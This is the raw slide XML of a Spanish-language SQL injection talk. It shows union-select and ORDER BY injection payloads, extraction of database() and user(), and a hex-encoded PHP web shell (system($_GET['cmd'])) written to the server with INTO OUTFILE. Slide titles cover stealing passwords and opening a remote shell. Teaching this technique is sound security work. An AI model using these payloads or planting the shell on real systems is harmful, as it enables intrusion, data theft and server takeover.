              </a:rPr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0x3c3f7068702053595354454d28245f4745545b22636d64e2809d5d29203f3e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ruta_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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120" y="1354089"/>
            <a:ext cx="192730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36" y="319849"/>
            <a:ext cx="3006759" cy="6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Cliente-Servidor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="WWW[1]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" b="261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Jugando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cadenas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TABLA WHERE campo = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>condición</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM TABLA WHERE campo = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM TABLA WHERE campo = ‘1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT campo1, campo2, campo3 FROM TABLA where campo1 = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>condicion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8794" y="1232682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198442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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filtro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campo1, campo2 FROM TABLA WHERE campo1=1 and 1=1 – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT campo1, campo2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> WHERE campo1 = 1 order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>campo_posicion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT campo1, campo2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> WHERE campo1 = 1 union select 1, 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Averiguando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campos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campo1, campo2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> WHERE campo1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY 4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campo1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY 2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campo1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY 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562" y="5939310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13306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Averiguando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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select 1, 2</a:t>
            </a:r>
          </a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database(),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238" y="593931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61" y="189111"/>
            <a:ext cx="2772809" cy="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Averiguando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campo1, campo2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WHERE campo1=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), 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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="20070225072815!PWNED!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2410374"/>
            <a:ext cx="3817451" cy="3765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225" y="6037730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20" y="319849"/>
            <a:ext cx="3109475" cy="7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Information_schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Captura de pantalla 2012-07-21 a la(s) 05.36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r="1090"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="312576" y="1670045"/>
            <a:ext cx="4384316" cy="3241832"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Captura de pantalla 2012-07-21 a la(s) 05.3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38" y="1670045"/>
            <a:ext cx="3824799" cy="4324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4" name="Content Placeholder 3" descr="Captura de pantalla 2012-07-21 a la(s) 05.38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r="659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608794" y="1354089"/>
            <a:ext cx="190163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@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hdstryOwrld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88" y="319849"/>
            <a:ext cx="3613208" cy="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55225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632</TotalTime>
  <Words>827</Words>
  <Application>Microsoft Macintosh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Revolution</vt:lpstr>
      <vt:lpstr>SQLi (SQL Injection)</vt:lpstr>
      <vt:lpstr>Cliente-Servidor</vt:lpstr>
      <vt:lpstr>Jugando con las cadenas</vt:lpstr>
      <vt:lpstr>Sin filtro de datos</vt:lpstr>
      <vt:lpstr>Averiguando número de campos</vt:lpstr>
      <vt:lpstr>Averiguando el nombre de la DB</vt:lpstr>
      <vt:lpstr>Averiguando el usuario</vt:lpstr>
      <vt:lpstr>Information_schema</vt:lpstr>
      <vt:lpstr>TABLES</vt:lpstr>
      <vt:lpstr>COLUMNS</vt:lpstr>
      <vt:lpstr>Buscando las tablas de usuario</vt:lpstr>
      <vt:lpstr>Averiguando campos de la tabla de usuarios</vt:lpstr>
      <vt:lpstr>Obteniendo contraseñas</vt:lpstr>
      <vt:lpstr>Buscar forma de identificarse</vt:lpstr>
      <vt:lpstr>Creando archivos en el servidor remoto</vt:lpstr>
      <vt:lpstr>Escribir un fichero</vt:lpstr>
      <vt:lpstr>Leer un fichero</vt:lpstr>
      <vt:lpstr>Creando una shell remota.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 (SQL Injection)</dc:title>
  <dc:creator>Julio César Barrera Andrade</dc:creator>
  <cp:lastModifiedBy>Julio César Barrera Andrade</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-21T01:15:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-07-21T11:48:33Z</dcterms:modified>
</cp:coreProperties>
</file>